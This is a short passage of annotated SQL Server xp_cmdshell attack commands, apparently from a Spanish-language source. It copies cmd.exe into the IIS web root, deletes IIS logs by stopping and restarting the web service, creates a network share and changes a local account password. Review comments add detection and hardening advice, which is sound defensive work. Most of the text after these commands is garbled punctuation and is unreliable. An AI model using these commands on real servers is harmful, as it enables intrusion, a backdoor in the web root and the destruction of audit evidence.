EXEC master..xp_cmdshell 'copy c:\winnt\system32\cmd.exe
c:\inetpub\wwwroot\chroot.exe'
! )
"
-- Log-tampering sequence: list the IIS log directory, stop the web publishing
-- service so the log file is released, delete the log, then start the service again.
-- NOTE(review): the service display name is localized (Spanish) and has lost an
-- accented character in this copy; it is reproduced as found.
-- Defensive takeaways: forward web logs off-host in near real time so local
-- deletion does not erase the record; alert on unexpected stop/start events of the
-- web service and on gaps in log continuity; do not let the database service
-- account control services or write to the log directory.
EXEC master..xp_cmdshell 'DIR
c:\winnt\system32\logfiles\w3svc1\'
-- Stops the web service (display name as printed in the source).
EXEC master..xp_cmdshell 'NET STOP "Servicio de
publicacin en
World Wide Web"'
-- Deletes one log file from the IIS log directory.
EXEC master..xp_cmdshell 'del
c:\winnt\system32\logfiles\w3svc1\
filelog.log'
-- Restarts the web service.
EXEC master..xp_cmdshell 'NET START "Servicio de
publicacin en
World Wide Web"'
!
6 "
-- Publishes a local path as a network share; `nombre` and `drive:path` are the
-- document's placeholders, not real values.
-- NOTE(review): audit share creation, alert on net.exe launched by the SQL Server
-- process, and block inbound SMB at the perimeter.
EXEC master..xp_cmdshell 'NET SHARE nombre=drive:path'
!
"
6 G
"
-- Account manipulation through the OS shell; `username` and `password` are the
-- document's placeholders.
-- NOTE(review): as written (no /add switch) this form appears to set the password
-- of an existing local account; confirm against the surrounding text.
-- Detection: audit account-management events and alert on local account changes
-- that originate from the database service account.
EXEC master..xp_cmdshell 'NET USER username password'
:M&
"
"
8<
" "
"
.
">&
"
"
"
" #
" >8<
"
)7 )
" +
">&
"
"
"
"
&
>1
4 "
"
"
"
!
"
=
" .
" "
6 &"
*
&
.
. "
)
&
"
"
"
"> + >8<
#
!
"> 9
) =
" " ! "
"
" "
"
&
#0#$% # 6
"
*
"
"+" " "
6 "*
"
"
" )
"
9
" " >#
"
"
) "
"*
"
+
"
"
2B
"
"
"
"
"
Q
Q
Q "
Q *.
Q "6
+
)
- $ %+ )
%
"
"
"
4
&
)
*
(
Q
.
Q
) "M
Q .
Q .
Q .
M +
& *
"
"
"
%
"
<
<
<
<
> *
"
+(
9
:,-'F&
"
"
"
322&
9
" # )
7
9
9
<
<
<
<
<
&
"
"
" "
"
"+ 7
'
4
"
&
"
"
" H
"
" .
"
"
"
(
"
"
"
) 4
"
" +
#$%
9
4
>
"& 9
"
"
67"
<
#$% E$ +
" #$% 6=
#5& " )
*
" #$%&
) "
""
"
& ".
"
.
"
1 &
M
<&
6
Q .
6
Q" 6
Q
"
Q
Q 6
.
&9
4
.
"
>
. (( #
<
" "
" . "* .
"
+
"
*
+ ;
"
>&
7
"
"
2C
)
)4 "
6 " *="
" "
"
"
# 6
"
.
E
.
" 9
" 8
"
"
& ) "
" "
"
(
" *
"
6" "
#0#$% # 6 &
")
"
.
"
" &"
" Q
+" Q
9
"
"
)4 :%8
"
" * #$%
"
. * "+"
)4 F +
"
7
"
)4 6
" )
"
"
;
" Q
)4
`&
;
" Q
)4
`&
6
`&`
`
aa
M &
: ;! ; a
Va
"
# )
"
" ) "
9
7
9
&
"IF
*
)
5
*
"
7"
"
"
&9
"&
"
6"
"
"
"
" D
"
)
+ =
" &
J
" "
"
)
"
"
"
"
>;
""
"
" ) " "
& "
+
"
. &"
7
"
"
:
.
"
"
G )5
"
"
"
L 1;: : ;A %8L
>
>
+ =
"
"+ )
&
#$%
9 6
)
<"
6
"
( " E: ) =
"
*
" " "
#$% +
"
#
"
"
+! 4 >
"
"
#$% 4
*
#
'
%
#0#$%
)
.
"
"9
9 "
.J
#$% 4
) 4
"
! "
` : ;! ; a
= "
"
""
"
3
03 !
# )"
" ") "
1 :1 " )
H
"
1 "
J
"
""
0 +,# )"
" ") "
1 :1 " )
!
"5
1 "
J
" E *Q* KF
"
"
""
"
"
0$ .
#
':!S E8 "
# )"
" ") "
1 :1 " )
!
"5
J
""
""
"
" ) "K
0
# )"
" ") "
1 :1 " )
!
"5
"
J
""
""
" ) "K
"
" ""
"
E< Q
"
&" Q
" F
"@ %
"
&
.
*
"
'
"
" .
.
" .
"
&
9
"
& "
4
"
&
"& "
7 . "
6
7 . "
"
"
"
" *
" 6
"
"
"
"
"
".
(
#0#$%
"
"
"
"
"
"
" "
(
"
(
&
")
6
"
)
# 6
" " 6
"
"
"9
" J
" " 6
" ) "
"
"9
!
4 *="
" "" 6
8" ) (
! =
'
(
# *
*
"
"
<
+
" ;'! 322 + ,! 323F
1
"
" 6
" )
"
" 6
1
"
"
=
& "
"
"
"
! M
""
""
"
A
" 6=
"
"
) "
" 8"
"
6
#$% " 6
3
! " " "
.
" .
*
.
E,
" 6
"
) "
""
" . ( &
M"
)
*.
F
H *9
6
"
"
"
"
"
#0#$% # 6
8" ) (
"
6 . "
"& " )
"
" 9
(
" "
"
"
8" ) (
6 "
" .
6
"
* "
*
E
"
"
" .
) 0
"
"
"
*
(
"
M
" "
MF
8" ) (
""
*
#5
# "
9
" .
&
" "
"
*
"
."
6
#0#$%
6 '
1
4
)
) "
"
6
" "
"
"
" "
.
"
(
"
.
" H
6 )
"
"
) "
" ' 9 "
"
"
"
" "
"
"
" >$
> "
"
" 9
" " .
) "
"
"A %
#0#$% # 6
"
6 "
" 6
" .
&
9
.
6 (
"
" "
"
'
"
6
" .
6
8
!
"
"
.
9
"
"
*
"
&
"
"
+
"
""
") " & ")
<
M ." )
#0#$% # 6
"
"
6 & <"
"9
"
"
+ "*
"
" +# 6 "!
" )
"
"&
6 "
" .
G
"
" "
"
" . > +
"
"
"
) = 6 " #$% 4
# )
*
"
"
*
M .
*
"
"*
"&
"
"
) =
"
.
6
)
"
)
" " " "
" . (
# #;8 5 G
"
(
M"
".
"
)
"
.
"
""
" 9
" ) "
+ = "
7<
" +
"
"
8
" G
"
""
"+
"
"
"
"
6 " E;
"
"
9
"
"
"
" 7
"
"
"
"&
6
"
"
"&
.
" .
6"
"
" .
"
"
" . "&
" "A
= &
*.
" ""
* "
*
& " )
"" 6
>
.= " )
"
)
"
*=
4
& 74
.
"
&
"
&
"
"
"
#0#$%F 8"
. " D " ". *
32
'
6
G
"
2& + "
" ")
"9
" "
"
" )
"
" " .
E5
(
" 5
"& ,
6 " # .
& 8A#& F "=
)7
%81;:
" *
"
( " "
"
"
* & "
"
9
".
)
"
"
#0 #& #0#$%& # "
" 8 !&
"
"
)
( "
*
&
"
.
&+
9
#:- 8 " "
6
5
"
"
"
"
9
+
" " "
"
"
6 " .
6"
"
"
"
"& +
5 " >5 . !
"C
"
+ " 6
"
"
"
"
>
"
*
7
" + %
" 9
"
M . 8< "
M
.
"9 "
7
" #$%
" '
"
<
% & ! &
G
"
> E #-1 B303B 022CB0@F
M
"
Q QG
"
"9 "9 Q 3
" *
"9 6
6 " +
"
+
"
" #$% 4
G
!
*
"
"
"
.Q#$%Q# 6 Q " .Q#$%Q 4
*
< . ""
" 6
Q"9 Q 4
*
< . ""
"
Q 6
Q"9 Q 4
*
< . ""
" 0#$%
*
< . ""
"
M .0"9 0 ""
" *
< . ""
"6
.Q
) " Q"
+ *
"
"
+ 6 " ?,! 1 ! @8
"
. "
Q6
"9 "
"
"D
!
M "
M "
M
"
"
<
+
+
*
.'
"
M M
M " #9 )* (
+9
"
" 5
&
>
- M >
"
"
"*
" )
&
">
<
6
6
33
M
M
M
M
"
"
"
"
<< "
"
"
"
"
"
+ . 1; "
" #9 M (
+ . G "9
<
+ . G "9
.(
+ +
. )5
"0 0 @0) (
"
"*
"
"
" M
+
"B
01
0
0'
0S
"
"
, :!
"9
" . II )+ 5 .
' % . "
"
" *
" )
")
"I )+ 5 .
6.
"
*
* "
"
)+ 1
F )+
"
59 =
. &
" 6 =
"
.
"
= &+9
.
"
)
9
"
" .
D
. &
.
1
"
(
+
"
"
" "
"
"
"
. (( #
+ ;
>
> < 1
)
" )
"
"
"
+
9
"
")
6
"
"
"
"
"
(
&
9
" *
"9
"
"&
" < ") " ""
"
"
"
"
"
"
"
)7
. "
"
"
"
" *
" *
;
"
&
=
"
"
MQJ
% ! (
(
**
= "
.
"
"
;
"
"
/
!
9
"
#
& .
=
#0#$%&
"9
67"
"
+# *
"
" .
" "
#$% 4
% d
" "
"
*
>
"
&
# 9
. "
"
E8"
"
"
"
"
.
"J
. "
<"
" "
" " .
"KF
"
"
9 D
"
+*
O1 <